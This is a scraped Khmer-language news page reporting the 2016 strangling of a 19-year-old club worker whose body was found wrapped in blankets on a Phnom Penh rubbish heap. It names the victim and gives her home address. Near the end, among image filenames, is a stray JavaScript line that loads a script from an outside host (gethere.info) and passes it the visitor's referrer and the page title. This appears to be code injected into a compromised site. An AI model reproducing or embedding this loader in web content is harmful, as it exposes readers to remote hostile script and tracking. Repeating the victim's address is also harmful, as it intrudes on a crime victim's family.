Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

Update! ស្គាល់អត្តសញ្ញាណ សពយុវត្តីបំរើការងារនៅក្លឹប៥៥ ត្រូវជនមិនស្គាល់មុខរិតក សម្លាប់យកមកទម្លាំងចោលក្នុងសង្កាត់ភ្នំពេញថ្មីហើយ!

ភ្នំពេញ៖ សពស្ត្រីម្នាក់ត្រូវបានប្រជាពលរដ្ឋប្រទះឃើញរុំនិងភួយហើយចងយកមកប្កុងចោលនៅលើគាំនរសំរាមមួយកន្លែងបង្ករភ្ញាក់ផ្អើកាលពីម៉ោង១០និង៣០នាទីព្រឹកថ្ងៃទី១៦វិច្ឆិការ២០១៦ នៅចំណុចក្បែដងផ្លូវបេតុង១០០៣ ក្រុម៤ភូមិទំនប់សង្កាត់ភ្នំពេញថ្មីខណ្ឌសែនសុខ។សមត្ថកិច្ចបានប្រាប់ថាសពស្ត្រីខាងលើឈ្មោះកែវ កញ្ញា អាយុ ១៩ឆ្នាំមុខរបរបុគ្គលិកក្លិប៥៥ស្នាក់នៅផ្ទះ លេខ ១១៤៧ ផ្លូវ ជាតិលេខ២ក្រុម១២ភូមិព្រែកតានូសង្កាត់ចាក់អង្រែលើខណ្ឌមាន
ជ័យ។
ប្រភពពីបុរសម្នាក់ឈ្មោះខេង គួក ហៅជ្រូក អាយុ៤២ឆ្នាំមុខរបររើសអេតចាយបានប្រាប់ថាមុនកើតហេតុគាត់បានទៅរើសអេតចាយនៅចំណុចខាងលើបានឃើញភួយពណ៌ក្រហមមានផ្ការពណ៌លឿងពេលនោះគាត់បានទៅ ទាញភួយខាងលើមើលស្រាប់តែឃើញជើងសពស្ត្រីខាងលើពេលនោះគាត់បានហៅអ្នកដំណើរឆ្លងកាត់ទីនោះអោយមកជួយមើលនិងបង្ករភ្ញាក់ផ្អើតែម្តងហើយបានប្តឹងសមត្ថកិច្ចមូលដ្ឋានអោយចុះមកពិនិត្យ។

ក្រោយពីសមត្ថកិច្ចមូលដ្ឋានចុះពិនិត្យឃើញរុំលើសាកសពមានភួយផ្កាពណ៌ក្រហមចំនួន១ភួយពណ៌ផ្ការឈូកលាយសចំនួន១និងកន្លែងពោះគោពណ៌ស្វាយចំនួន១ដែលរុំសាកសពខ្សែរនីឡុងសំរាប់ចង១ខ្សែប្រវែង០៩ ម៉ែត្រ ០២តឹកនិងឌុយខ្សែរភ្លើងពណ៌ខ្មៅចំនួន០១មានប្រវែង១ម៉ែត្រ៤២តឹកបានរឹតជាប់កសពស្ត្រីខាងលើត្រូវបានសមត្ថកិច្ចដឹកយកមកធ្វើកោសល្យវិច្ឆ័យនៅវត្តក្រាំងធ្នង់។

តាមការបញ្ជាក់ប្រាប់ពីលោកឧកញ៉ាវិជ្ជបណ្ឌិត នង សុវណ្ណរ័ត្នក្រោយពីពិនិត្យនិងធ្វើកោសល្យវិច្ឆ័យទៅលើសាកសពបានប្រាប់ថាស្ត្រីនេះបានស្លាប់ដោយសារថប់ដង្ហើម(គេរឹតក)សម្លាប់
ក្រោយពីពិនិត្យរួចសពបានប្រគល់អោយសាច់ញាត្តិយកទៅដំកល់ធ្វើបុណ្យតាមប្រពៃណីីនៅវត្តចាក់អង្រែក្រោម។

img_9941 img_9942 img_9943 img_9952 img_9954 img_9955 img_9956 img_9959

img_97481a4037da-44b4-46b1-9008-b4e928ff5139 2469a77e-7289-4233-b459-e096fd2bd802 02648cf3-cb7c-4f4a-b80d-38b504610385 3038ca7a-457b-4d5a-bcba-a3009f7033d7 img_9734

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More